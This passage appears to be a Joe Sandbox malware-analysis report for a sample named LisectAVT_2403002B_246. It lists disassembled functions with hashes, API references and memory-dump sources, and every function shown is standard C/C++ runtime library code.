Opcode Fuzzy Hash: 244c2839b2402f23b20ea5b387b9044c525da466aeb755f1296e91140f7a4eab
Instruction Fuzzy Hash: 56314AB0D00209DBCB04EF94C991BEEBBB1FF58310F20565AE415B7391DB345A06CBA1

Function 00ED7790 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00ED77B0
int.LIBCPMTD ref: 00ED77C9

Part of subcall function 00ED1E00: std::_Lockit::_Lockit.LIBCPMT ref: 00ED1E16
Part of subcall function 00ED1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00ED1E40

Concurrency::cancel_current_task.LIBCPMTD ref: 00ED7809
std::_Lockit::~_Lockit.LIBCPMT ref: 00ED7871

Strings

(v, xrefs: 00ED7879

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID: (v
API String ID: 3053331623-234128963
Opcode ID: d2e06d371c07b9701a6ddd17719b5cdb1827a2dbc3839774c418f8b6882e27e1
Instruction ID: d793fe15a40c345f99dade795c6bf6833b5bd11aa867f573ee77f6bda3503cc0
Opcode Fuzzy Hash: d2e06d371c07b9701a6ddd17719b5cdb1827a2dbc3839774c418f8b6882e27e1
Instruction Fuzzy Hash: 80314B74D04209DBCB04DF94D981BEEBBB0FF48310F20562AE511B7391DB345A42CBA1

Function 00EE3638 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9B965E69,u,?,00000000,00EF7613,000000FF,?,00EE35D2,?,?,00EE35A6,?), ref: 00EE366D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EE367F
FreeLibrary.KERNEL32(00000000,?,00000000,00EF7613,000000FF,?,00EE35D2,?,?,00EE35A6,?), ref: 00EE36A1

Strings

u, xrefs: 00EE364C
CorExitProcess, xrefs: 00EE3677
mscoree.dll, xrefs: 00EE3666

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$u
API String ID: 4061214504-501404622
Opcode ID: 3a2e06aea4ae39078297a2f1afe243f0525674d4748957d72ed12fcada55584c
Instruction ID: 3edc8b0b243006e1ba8cf3d8374c3e7b8995506dda3561f04bd181d3dddd0e90
Opcode Fuzzy Hash: 3a2e06aea4ae39078297a2f1afe243f0525674d4748957d72ed12fcada55584c
Instruction Fuzzy Hash: FA01A232A44759BFDB119F61CC09BBFBBB8FB44B15F000629E911B2290DF749904CB80

Function 00ED3FE0 Relevance: 9.2, APIs: 6, Instructions: 179COMMON

Download Yara Rule

APIs

_Fgetc.LIBCPMTD ref: 00ED4066

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Fgetc
String ID:
API String ID: 1720979605-0
Opcode ID: 66bdcb76f1d3fa96745b398fe5f098cb91a17b54f7f71b50d981efdaa2abc47b
Instruction ID: 375ff309c3060f02b240d2940b86af2dc4b3e4786d5f3f58c417bf03788e2a82
Opcode Fuzzy Hash: 66bdcb76f1d3fa96745b398fe5f098cb91a17b54f7f71b50d981efdaa2abc47b
Instruction Fuzzy Hash: 7E6150B1C001099FCB14EBE4D9829EEB7B4EF14315F60622AE5127B3D5EB355E06CBA1

Function 00EDC94A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00EDC941,00EDB091,00EDA5CA), ref: 00EDC958
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EDC966
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EDC97F
SetLastError.KERNEL32(00000000,00EDC941,00EDB091,00EDA5CA), ref: 00EDC9D1

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b44c94738d29880ca70ad7062a41479d36def9b5eba0a5b766e7c89455f294c0
Instruction ID: d60ee0fbd72e37bee684163fab2ed51a6ea2130c8e521ea07192aba63c109f6c
Opcode Fuzzy Hash: b44c94738d29880ca70ad7062a41479d36def9b5eba0a5b766e7c89455f294c0
Instruction Fuzzy Hash: 5F01243320D3126EE6A526757C95A667684EB813BC730232BF010B53F0EF212C0BE144

Function 00EDD9E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00EDDAA3,?,?,00F085C4,00000000,?,00EDDBCE,00000004,InitializeCriticalSectionEx,00EF9C0C,InitializeCriticalSectionEx,00000000), ref: 00EDDA72

Strings

api-ms-, xrefs: 00EDDA32

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 6933a086b697e673158c0785b0add6d7171147520d2df97249c3c7e3fff94bb6
Instruction ID: 68f55ab38b11176325a334f4043fb5d8830dfab0743117772c1ca63189b40928
Opcode Fuzzy Hash: 6933a086b697e673158c0785b0add6d7171147520d2df97249c3c7e3fff94bb6
Instruction Fuzzy Hash: BE11E332A0C625EBDF228B689C00B6A3398EB01774F249112E914FB380DE70ED06C6D4

Function 00EEB29D Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00EEB322
__alloca_probe_16.LIBCMT ref: 00EEB3EB
__freea.LIBCMT ref: 00EEB452

Part of subcall function 00EE824E: RtlAllocateHeap.NTDLL(00000000,00EEE6D6,00000000,?,00EEE6D6,00000220,?,?,00000000), ref: 00EE8280

__freea.LIBCMT ref: 00EEB465
__freea.LIBCMT ref: 00EEB472

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: b0965b0f12b18575ee614d4688034a9f0bf44f9f1cbb77e7de164dfcfe7fcb44
Instruction ID: 0580e5183458431d9626e950a24410391eca413b9ebd850ed0e5e658c2925acb
Opcode Fuzzy Hash: b0965b0f12b18575ee614d4688034a9f0bf44f9f1cbb77e7de164dfcfe7fcb44
Instruction Fuzzy Hash: 5A51B17260029EABEF205F629C81EBB76ADEF44714F196529BD14F62A6F730CC10C660

Function 00ED42D0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00ED4310
char_traits.LIBCPMTD ref: 00ED4345
char_traits.LIBCPMTD ref: 00ED4360
char_traits.LIBCPMTD ref: 00ED438B

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-0
Opcode ID: 479bd20052fa9b755961ea426f786315222a3e58f121c850a8bdd67ed70cee08
Instruction ID: 569f35ead2fcdede278b9ead9be8b5ba435a806d69500668702edea85f96231d
Opcode Fuzzy Hash: 479bd20052fa9b755961ea426f786315222a3e58f121c850a8bdd67ed70cee08
Instruction Fuzzy Hash: 0631B5F5D00119ABCB04EBA4D8519EE77B5EF60305F04A07BE546BB382EB319A47CB91

Function 00ED6DFD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00ED6DE8
ctype.LIBCPMTD ref: 00ED6E14
std::ios_base::good.LIBCPMTD ref: 00ED6E7B

Strings

]t, xrefs: 00ED6DD2
L7, xrefs: 00ED6E80

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: char_traitsctypestd::ios_base::good
String ID: L7$]t
API String ID: 3503515737-1523685022
Opcode ID: 7ee9ec8653e08cc9b582632a6e2ba0144898d9cde8d6a7188fa55776e734af8e
Instruction ID: c410d8db5fc3ec62162415044582f7c6866f02f317f12c81141b4e7413731fb7
Opcode Fuzzy Hash: 7ee9ec8653e08cc9b582632a6e2ba0144898d9cde8d6a7188fa55776e734af8e
Instruction Fuzzy Hash: 2511EC75E05209DBCB08DF94D5A2ABEBBB1EF44314F14515BE6127B351CB30A946CB90

Function 00EE680B Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(9B965E69,00000000,00000000,?), ref: 00EE686E

Part of subcall function 00EED831: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00EEB448,?,00000000,-00000008), ref: 00EED892

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EE6AC0
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EE6B06
GetLastError.KERNEL32 ref: 00EE6BA9

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: f6de2a76362459e6674f487be4439ad2d3e7328a87529a5cfeff927c501bcfa6
Instruction ID: 238b208e9f3d486cac1f4c16f2dc9eb60e931b2126768122cae46be5622e781e
Opcode Fuzzy Hash: f6de2a76362459e6674f487be4439ad2d3e7328a87529a5cfeff927c501bcfa6
Instruction Fuzzy Hash: 80D177B5D0028C9FCB15CFA9C8809EDBBB5FF18354F28516AE856FB351D630A942CB50

Function 00EDCA61 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00EDCB28
___AdjustPointer.LIBCMT ref: 00EDCB4B
___AdjustPointer.LIBCMT ref: 00EDCBE7

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: fe03816a01f1d6e056e5528f6220af11cfe9bd5da1b6d01a329cbab0aacd3996
Instruction ID: 915e500150be6c32d253bda80971f729745bfaa07c46e7d7aa58738634030abe
Opcode Fuzzy Hash: fe03816a01f1d6e056e5528f6220af11cfe9bd5da1b6d01a329cbab0aacd3996
Instruction Fuzzy Hash: 5351AFB29012079FDB298F10D842BAA77A4EF44794F34592BE805A7391E731EC83DB90

Function 00EEDBEE Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00EED831: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00EEB448,?,00000000,-00000008), ref: 00EED892

GetLastError.KERNEL32 ref: 00EEDC52
__dosmaperr.LIBCMT ref: 00EEDC59
GetLastError.KERNEL32(?,?,?,?), ref: 00EEDC93
__dosmaperr.LIBCMT ref: 00EEDC9A

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 3574885294bb9258916d03f4133b9e456fb0477ce51d22cf436b7ac4c7d3ac34
Instruction ID: cec71e29faec0d82f517f50b7da5397aee4e84a46cb4659e46ac7a30b8410757
Opcode Fuzzy Hash: 3574885294bb9258916d03f4133b9e456fb0477ce51d22cf436b7ac4c7d3ac34
Instruction Fuzzy Hash: 9021D33160828DAFDB20AF678C8196AF7ADEF413A87205519F919B7240DB70EC40CB91

Function 00EE2697 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e24be355c49e0f91cecaaf7d04524bdcff76da53c3cb7755202c8235bf70b811
Instruction ID: bb4ec423a2631dd5e4ae528d2cb51cef6d643e01046ef9cae4c11bbb0df83de4
Opcode Fuzzy Hash: e24be355c49e0f91cecaaf7d04524bdcff76da53c3cb7755202c8235bf70b811
Instruction Fuzzy Hash: 9A219F3160468DAFDB14AF738C9196AB7ADEF44369710651AFA18B7150EB30EC90CB90

Function 00EEEB76 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00EEEB7E

Part of subcall function 00EED831: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00EEB448,?,00000000,-00000008), ref: 00EED892

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EEEBB6
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EEEBD6

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 705f863ba14745396aae6edad7335a7eb4fde3357974e1110fc9326cf8315bc9
Instruction ID: 5eed76295b57b307210937499a29467796cf44a87766b8fa45b4707262969493
Opcode Fuzzy Hash: 705f863ba14745396aae6edad7335a7eb4fde3357974e1110fc9326cf8315bc9
Instruction Fuzzy Hash: 6E11D2B190559DBE6B2527B79D8ECBF6AACEE843983602424F806F2202FE24CD059175

Function 00EF5B03 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00EE0F0F,00000000,00000000,?,00EF1EDB,00000000,00000001,?,?,?,00EE6BFD,?,00000000,00000000), ref: 00EF5B1A
GetLastError.KERNEL32(?,00EF1EDB,00000000,00000001,?,?,?,00EE6BFD,?,00000000,00000000,?,?,?,00EE71D7,00000000), ref: 00EF5B26

Part of subcall function 00EF5AEC: CloseHandle.KERNEL32(FFFFFFFE,00EF5B36,?,00EF1EDB,00000000,00000001,?,?,?,00EE6BFD,?,00000000,00000000,?,?), ref: 00EF5AFC

___initconout.LIBCMT ref: 00EF5B36

Part of subcall function 00EF5AAE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EF5ADD,00EF1EC8,?,?,00EE6BFD,?,00000000,00000000,?), ref: 00EF5AC1

WriteConsoleW.KERNEL32(00000000,00000000,00EE0F0F,00000000,?,00EF1EDB,00000000,00000001,?,?,?,00EE6BFD,?,00000000,00000000,?), ref: 00EF5B4B

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e4b5d3b7c5ec2161e24e050b49369b69e6220e58a72663815e34d93a2d80c993
Instruction ID: 139143ac3f5abbc85a705f13304b77b55e4a1699358e4b9d4b8a5418ae117af3
Opcode Fuzzy Hash: e4b5d3b7c5ec2161e24e050b49369b69e6220e58a72663815e34d93a2d80c993
Instruction Fuzzy Hash: DAF0F83660061ABFDF222F92DC049AE3F66FB583A0F004050FB0DA6530CA328964EB90

Function 00EE23DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00EE246D

Strings

pow, xrefs: 00EE2445, 00EE2462

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 0ed95419c2c377b14c9a891435751767721ee34e58b2c1cdace308a8968ae7f5
Instruction ID: b1d42bbb6030eeaec75d3bc9c1385e767c183d06ffeaf20450d87d9a9edf1d7a
Opcode Fuzzy Hash: 0ed95419c2c377b14c9a891435751767721ee34e58b2c1cdace308a8968ae7f5
Instruction Fuzzy Hash: C1517C6090C58E96CB117F17CE413BA27A8EB50714F307D6CF5F5B22E8EA358C89DA46

Function 00EF6005 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(00000000,00EF41CC,00000000,cD,?,?,?,?,?,00EF5FF3,00000000,?,00EF41CC,?,00000000,cD), ref: 00EF6151
GetLastError.KERNEL32(?,?,?,?,?,00EF5FF3,00000000,?,00EF41CC,?,00000000,cD), ref: 00EF615B

Strings

cD, xrefs: 00EF6014

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorFileLast
String ID: cD
API String ID: 734332943-2029379377
Opcode ID: 943f67fb83efd2a6903a3574daccea18be5886facaaac347e98aec0c4e3aff07
Instruction ID: 59a3eddad2b7d444795b3a25167b195f83c6424f25f11c8210e3af9b4acbe807
Opcode Fuzzy Hash: 943f67fb83efd2a6903a3574daccea18be5886facaaac347e98aec0c4e3aff07
Instruction Fuzzy Hash: 7C51357190164DBBEB248F79CC85BBE7BB0AF04328F242219F605B61D2D730E990CB90

Function 00EDC750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00EDC78F
__IsNonwritableInCurrentImage.LIBCMT ref: 00EDC843

Strings

csm, xrefs: 00EDC82D

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 89cc6e187059e5daaf648e8737b51a4dc61ab7f7018fc1da129fc1e07d56643a
Instruction ID: 6837bb474e4d7b368b5d34fa8f9d0bdc3c2f20d7371f38c34c6c3f1e1ac0dafe
Opcode Fuzzy Hash: 89cc6e187059e5daaf648e8737b51a4dc61ab7f7018fc1da129fc1e07d56643a
Instruction Fuzzy Hash: AD419334A0020A9BCF14DF69C884A9EBBE5EF45354F249157E818BB392D771A906CF91

Function 00EDD062 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00EDD087

Strings

MOC, xrefs: 00EDD099
RCC, xrefs: 00EDD0A1

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: c723e171b3e2a5eaebfe435ae1d8c45fb2e450ddbe92d5a06896c67c86153f94
Instruction ID: 1dae2e2787f96e998885cca8f760f665c837aa0dfec62a9b5a8ce49099ee493b
Opcode Fuzzy Hash: c723e171b3e2a5eaebfe435ae1d8c45fb2e450ddbe92d5a06896c67c86153f94
Instruction Fuzzy Hash: 5541487190020AEFCF16DF98CD81AAEBBB6FF48308F18919AF91477261D3359952DB50

Function 00ED5B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00ED5BCA
codecvt.LIBCPMTD ref: 00ED5C00

Strings

